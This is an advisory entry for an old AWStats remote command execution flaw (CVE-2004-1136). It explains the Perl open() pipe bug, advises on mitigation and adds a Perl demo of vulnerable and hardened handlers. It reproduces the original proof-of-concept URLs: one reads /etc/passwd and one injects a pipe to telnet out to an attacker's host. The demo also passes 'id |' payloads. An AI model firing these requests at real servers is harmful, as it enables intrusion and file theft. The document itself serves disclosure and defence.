Vendor: AWStats
By: Unknown
CVSS: 9 (CRITICAL)
Vulnerability: Remote Command Execution
CWE: 78
Product Name: AWStats
Affected Version From: AWStats before 6.0
Affected Version To: AWStats 6.0
Patch Exists: YES
Related CVE: CVE-2004-1136
CPE: a:awstats_project:awstats
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2004

awstats.pl Remote Command Execution

The awstats.pl script in AWStats before 6.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) config parameter or (2) framename parameter.

The published proof of concept below does not inject into config or framename directly: it selects the rawlog plugin (pluginmode=rawlog) and supplies a logfile parameter, which the script passes to Perl's open(). With the two-argument form of open(), a value that begins or ends with '|' is a pipe, so the remainder is run as a shell command; any other value is opened for reading and rendered as log lines. That is why the first request is an arbitrary file read (/etc/passwd) and the second, with a leading '|', is command execution. The config parameter must still name a configuration file that exists on the target (awstats.<config>.conf), otherwise awstats.pl exits with a config error before the plugin runs; the value stats.jdims.info in the raw data is simply the one the original author used.

Mitigation:

Upgrade to AWStats 6.0 or later. Later releases fixed further command-injection bugs in awstats.pl, so install the current release rather than exactly 6.0. Whatever the version, do not leave awstats.pl reachable by anonymous users: put it behind web-server authentication or an IP allow-list, and run the CGI as an unprivileged account so that a successful injection is limited to what that account can read and execute.

Exploit-DB raw data:

Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]
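Added illustration of the bug class behind the two requests above. This is not part of the original advisory and not AWStats' own source: it is a minimal stand-in for a CGI handler that opens a log file named by the caller, next to a hardened version that uses three-argument open() with an explicit '<' mode and confines the name to an allow-listed directory. The function names, the directory /var/log/httpd and the payload strings are assumptions made for the demo.

```perl
#!/usr/bin/perl
# Added illustration of the bug class in this advisory. Not AWStats code:
# a stand-in for a CGI that opens a log file named by the "logfile"
# request parameter, as the rawlog viewer did.
use strict;
use warnings;
use File::Basename qw(basename);

# VULNERABLE: two-argument open(). With no explicit mode, Perl treats a
# leading or trailing '|' in the name as a pipe and runs the rest through
# the shell, so "|telnet <ip> <port>" or "id |" executes a command instead
# of opening a file. Any other value is opened for reading, which is the
# /etc/passwd disclosure in the first request of the raw data.
sub rawlog_vulnerable {
    my ($logfile) = @_;
    open(my $fh, $logfile) or return ("open failed: $!\n");   # mode taken from the data
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

# HARDENED: the name is reduced to a basename, matched against a strict
# pattern and joined to a fixed directory ($LOG_DIR is a hypothetical
# location chosen for the demo); three-argument open() with '<' can only
# ever read a file, whatever characters the name contains.
my $LOG_DIR = '/var/log/httpd';

sub rawlog_hardened {
    my ($logfile) = @_;
    my $name = basename($logfile);
    return ("rejected: bad logfile name\n")
        unless $name =~ /\A[\w.-]+\z/ && $name ne '.' && $name ne '..';
    open(my $fh, '<', "$LOG_DIR/$name") or return ("open failed: $!\n");
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

# Demo: the same attacker-controlled values against both handlers.
# 'id |' mirrors the pipe injection; '/etc/passwd' mirrors the file read.
for my $payload ('id |', '/etc/passwd') {
    my @v = rawlog_vulnerable($payload);
    my @h = rawlog_hardened($payload);
    print "payload   : $payload\n";
    print "vulnerable: ", scalar(@v), " line(s), first: ", ($v[0] // "(none)\n");
    print "hardened  : ", join('', @h), "\n";
}
```

The leading-pipe form used in the raw data ("|telnet ...") opens the pipe for writing, so the handler reads nothing back and the HTTP response is empty or an error, but the process is still spawned and makes the outbound connection; that is all the original PoC relies on. In the hardened version the three-argument open() is what removes the command execution; the basename and pattern check are what remove the path traversal behind the /etc/passwd read.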